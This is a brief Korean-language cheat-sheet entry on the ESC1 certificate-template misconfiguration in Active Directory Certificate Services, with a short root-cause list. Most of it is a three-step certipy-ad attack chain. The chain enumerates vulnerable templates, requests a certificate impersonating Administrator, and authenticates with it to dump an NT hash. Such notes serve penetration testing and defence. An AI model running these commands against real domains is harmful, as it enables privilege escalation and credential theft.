ESC1
속성
값
Abuse
# 취약한 템플릿 열거
certipy-ad find -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -vulnerable -stdout -enabled
# 템플릿을 통한 인증서 발급
certipy-ad req -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -ca '<ca-name>' -template '<template-name>' -upn Administrator -target '<ca-fqdn>' -key-size 4096 -sid '<sid>'
# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx '<pfx>' -dc-ip '<dc-ip>'Root Cause
Enrollee Supplies Subject

Enrollment Rights

Requires Manager Approval & Authorized Signatures Required

References
Last updated